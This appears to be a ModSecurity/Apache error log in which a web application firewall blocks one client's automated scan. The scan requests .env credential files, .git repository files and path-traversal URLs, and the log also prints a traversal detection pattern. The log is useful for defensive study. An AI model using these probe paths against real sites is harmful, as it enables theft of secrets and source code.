[Tue May 12 02:39:41.703068 2026] [security2:error] [pid 1691274:tid 1691279] [client 93.123.109.164:37934] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "totalcloud.fr"] [uri "/_next/image"] [unique_id "agJ2zVfdQaraX_prmqceMgAAAAI"]
[Tue May 12 02:39:41.703920 2026] [security2:error] [pid 1691274:tid 1691279] [client 93.123.109.164:37934] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "totalcloud.fr"] [uri "/403.shtml"] [unique_id "agJ2zVfdQaraX_prmqceMgAAAAI"]
[Tue May 12 02:39:41.709070 2026] [security2:error] [pid 1691274:tid 1691637] [client 93.123.109.164:37792] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "totalcloud.fr"] [uri "/.env.production.local"] [unique_id "agJ2zVfdQaraX_prmqceMwAAAA4"]
[Tue May 12 02:39:41.709184 2026] [security2:error] [pid 1691274:tid 1691637] [client 93.123.109.164:37792] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "totalcloud.fr"] [uri "/.env.production.local"] [unique_id "agJ2zVfdQaraX_prmqceMwAAAA4"]
[Tue May 12 02:39:41.709187 2026] [security2:error] [pid 1707624:tid 1707684] [client 93.123.109.164:37872] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "totalcloud.fr"] [uri "/backend/.env"] [unique_id "agJ2zbOxS7i6i_mT2NLHSwAAAEI"]
[Tue May 12 02:39:41.709267 2026] [security2:error] [pid 1695975:tid 1696002] [client 93.123.109.164:37892] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "totalcloud.fr"] [uri "/.env.old"] [unique_id "agJ2zdVI9ymHBxup74-LTgAAAJg"]
[Tue May 12 02:39:41.709299 2026] [security2:error] [pid 1707624:tid 1707684] [client 93.123.109.164:37872] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "totalcloud.fr"] [uri "/backend/.env"] [unique_id "agJ2zbOxS7i6i_mT2NLHSwAAAEI"]
[Tue May 12 02:39:41.709413 2026] [security2:error] [pid 1695975:tid 1696002] [client 93.123.109.164:37892] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "totalcloud.fr"] [uri "/.env.old"] [unique_id "agJ2zdVI9ymHBxup74-LTgAAAJg"]
[Tue May 12 02:39:41.709452 2026] [security2:error] [pid 1691274:tid 1691637] [client 93.123.109.164:37792] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "totalcloud.fr"] [uri "/403.shtml"] [unique_id "agJ2zVfdQaraX_prmqceMwAAAA4"]
[Tue May 12 02:39:41.709548 2026] [security2:error] [pid 1707624:tid 1707684] [client 93.123.109.164:37872] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "totalcloud.fr"] [uri "/403.shtml"] [unique_id "agJ2zbOxS7i6i_mT2NLHSwAAAEI"]
[Tue May 12 02:39:41.709843 2026] [security2:error] [pid 1695975:tid 1696002] [client 93.123.109.164:37892] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "totalcloud.fr"] [uri "/403.shtml"] [unique_id "agJ2zdVI9ymHBxup74-LTgAAAJg"]
[Tue May 12 02:39:41.713984 2026] [security2:error] [pid 1709071:tid 1709090] [client 93.123.109.164:37778] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/refs/heads/master"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "totalcloud.fr"] [uri "/.git/refs/heads/master"] [unique_id "agJ2zbvMumyrWMfSu7qoxwAAAMM"]
[Tue May 12 02:39:41.714017 2026] [security2:error] [pid 1730175:tid 1730187] [client 93.123.109.164:37888] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "totalcloud.fr"] [uri "/.env.production"] [unique_id "agJ2zXo6NvB9WXx5V-55HQAAAQo"]
[Tue May 12 02:39:41.714105 2026] [security2:error] [pid 1709071:tid 1709090] [client 93.123.109.164:37778] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "totalcloud.fr"] [uri "/.git/refs/heads/master"] [unique_id "agJ2zbvMumyrWMfSu7qoxwAAAMM"]
[Tue May 12 02:39:41.714127 2026] [security2:error] [pid 1730175:tid 1730187] [client 93.123.109.164:37888] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "totalcloud.fr"] [uri "/.env.production"] [unique_id "agJ2zXo6NvB9WXx5V-55HQAAAQo"]
[Tue May 12 02:39:41.714239 2026] [security2:error] [pid 1695975:tid 1695999] [client 93.123.109.164:37806] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/logs/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "totalcloud.fr"] [uri "/.git/logs/HEAD"] [unique_id "agJ2zdVI9ymHBxup74-LTwAAAJU"]
[Tue May 12 02:39:41.714361 2026] [security2:error] [pid 1695975:tid 1695999] [client 93.123.109.164:37806] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "totalcloud.fr"] [uri "/.git/logs/HEAD"] [unique_id "agJ2zdVI9ymHBxup74-LTwAAAJU"]
[Tue May 12 02:39:41.714515 2026] [security2:error] [pid 1709071:tid 1709090] [client 93.123.109.164:37778] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "totalcloud.fr"] [uri "/403.shtml"] [unique_id "agJ2zbvMumyrWMfSu7qoxwAAAMM"]
[Tue May 12 02:39:41.714709 2026] [:error] [pid 1730207:tid 1730222] [client 93.123.109.164:37808] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 02:39:41.714774 2026] [security2:error] [pid 1695975:tid 1695999] [client 93.123.109.164:37806] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "totalcloud.fr"] [uri "/403.shtml"] [unique_id "agJ2zdVI9ymHBxup74-LTwAAAJU"]
[Tue May 12 02:39:41.714820 2026] [security2:error] [pid 1730175:tid 1730187] [client 93.123.109.164:37888] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "totalcloud.fr"] [uri "/403.shtml"] [unique_id "agJ2zXo6NvB9WXx5V-55HQAAAQo"]
[Tue May 12 02:39:41.728347 2026] [:error] [pid 1695975:tid 1696002] [client 93.123.109.164:37892] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 02:39:41.753217 2026] [security2:error] [pid 1730175:tid 1730187] [client 93.123.109.164:37888] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "totalcloud.fr"] [uri "/.env"] [unique_id "agJ2zXo6NvB9WXx5V-55HgAAAQo"]
[Tue May 12 02:39:41.753230 2026] [core:error] [pid 1730207:tid 1730222] [client 93.123.109.164:37808] AH10244: invalid URI path (/../.env)
[Tue May 12 02:39:41.753351 2026] [security2:error] [pid 1730175:tid 1730187] [client 93.123.109.164:37888] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "totalcloud.fr"] [uri "/.env"] [unique_id "agJ2zXo6NvB9WXx5V-55HgAAAQo"]
[Tue May 12 02:39:41.753570 2026] [security2:error] [pid 1730175:tid 1730187] [client 93.123.109.164:37888] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "totalcloud.fr"] [uri "/403.shtml"] [unique_id "agJ2zXo6NvB9WXx5V-55HgAAAQo"]
[Tue May 12 02:39:41.753889 2026] [:error] [pid 1730207:tid 1730222] [client 93.123.109.164:37808] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 02:39:41.754182 2026] [security2:error] [pid 1709071:tid 1709090] [client 93.123.109.164:37778] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "totalcloud.fr"] [uri "/.env.local"] [unique_id "agJ2zbvMumyrWMfSu7qoyAAAAMM"]
[Tue May 12 02:39:41.754297 2026] [security2:error] [pid 1709071:tid 1709090] [client 93.123.109.164:37778] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "totalcloud.fr"] [uri "/.env.local"] [unique_id "agJ2zbvMumyrWMfSu7qoyAAAAMM"]
[Tue May 12 02:39:41.754532 2026] [security2:error] [pid 1709071:tid 1709090] [client 93.123.109.164:37778] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "totalcloud.fr"] [uri "/403.shtml"] [unique_id "agJ2zbvMumyrWMfSu7qoyAAAAMM"]
[Tue May 12 02:39:41.754798 2026] [security2:error] [pid 1695975:tid 1695999] [client 93.123.109.164:37806] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /storage/app/../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "totalcloud.fr"] [uri "/.env"] [unique_id "agJ2zdVI9ymHBxup74-LUQAAAJU"]
[Tue May 12 02:39:41.754887 2026] [security2:error] [pid 1695975:tid 1695999] [client 93.123.109.164:37806] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "totalcloud.fr"] [uri "/.env"] [unique_id "agJ2zdVI9ymHBxup74-LUQAAAJU"]
[Tue May 12 02:39:41.755071 2026] [security2:error] [pid 1695975:tid 1695999] [client 93.123.109.164:37806] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "totalcloud.fr"] [uri "/.env"] [unique_id "agJ2zdVI9ymHBxup74-LUQAAAJU"]
[Tue May 12 02:39:41.755550 2026] [security2:error] [pid 1695975:tid 1695999] [client 93.123.109.164:37806] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "totalcloud.fr"] [uri "/403.shtml"] [unique_id "agJ2zdVI9ymHBxup74-LUQAAAJU"]
[Tue May 12 02:39:41.762137 2026] [security2:error] [pid 1695975:tid 1696002] [client 93.123.109.164:37892] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "totalcloud.fr"] [uri "/.env.development"] [unique_id "agJ2zdVI9ymHBxup74-LUgAAAJg"]
[Tue May 12 02:39:41.762255 2026] [security2:error] [pid 1695975:tid 1696002] [client 93.123.109.164:37892] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "totalcloud.fr"] [uri "/.env.development"] [unique_id "agJ2zdVI9ymHBxup74-LUgAAAJg"]
[Tue May 12 02:39:41.762510 2026] [security2:error] [pid 1695975:tid 1696002] [client 93.123.109.164:37892] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "totalcloud.fr"] [uri "/403.shtml"] [unique_id "agJ2zdVI9ymHBxup74-LUgAAAJg"]
[Tue May 12 02:39:41.781190 2026] [security2:error] [pid 1709071:tid 1709090] [client 93.123.109.164:37778] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/refs/heads/main"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "totalcloud.fr"] [uri "/.git/refs/heads/main"] [unique_id "agJ2zbvMumyrWMfSu7qoygAAAMM"]
[Tue May 12 02:39:41.781379 2026] [security2:error] [pid 1709071:tid 1709090] [client 93.123.109.164:37778] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "totalcloud.fr"] [uri "/.git/refs/heads/main"] [unique_id "agJ2zbvMumyrWMfSu7qoygAAAMM"]
[Tue May 12 02:39:41.781690 2026] [security2:error] [pid 1709071:tid 1709090] [client 93.123.109.164:37778] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "totalcloud.fr"] [uri "/403.shtml"] [unique_id "agJ2zbvMumyrWMfSu7qoygAAAMM"]
[Tue May 12 02:39:41.785404 2026] [:error] [pid 1730175:tid 1730187] [client 93.123.109.164:37888] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 02:39:41.794501 2026] [:error] [pid 1695975:tid 1696002] [client 93.123.109.164:37892] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 02:39:41.794752 2026] [security2:error] [pid 1695975:tid 1695999] [client 93.123.109.164:37806] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/commit_editmsg"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "totalcloud.fr"] [uri "/.git/COMMIT_EDITMSG"] [unique_id "agJ2zdVI9ymHBxup74-LVgAAAJU"]
[Tue May 12 02:39:41.794923 2026] [security2:error] [pid 1695975:tid 1695999] [client 93.123.109.164:37806] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "totalcloud.fr"] [uri "/.git/COMMIT_EDITMSG"] [unique_id "agJ2zdVI9ymHBxup74-LVgAAAJU"]
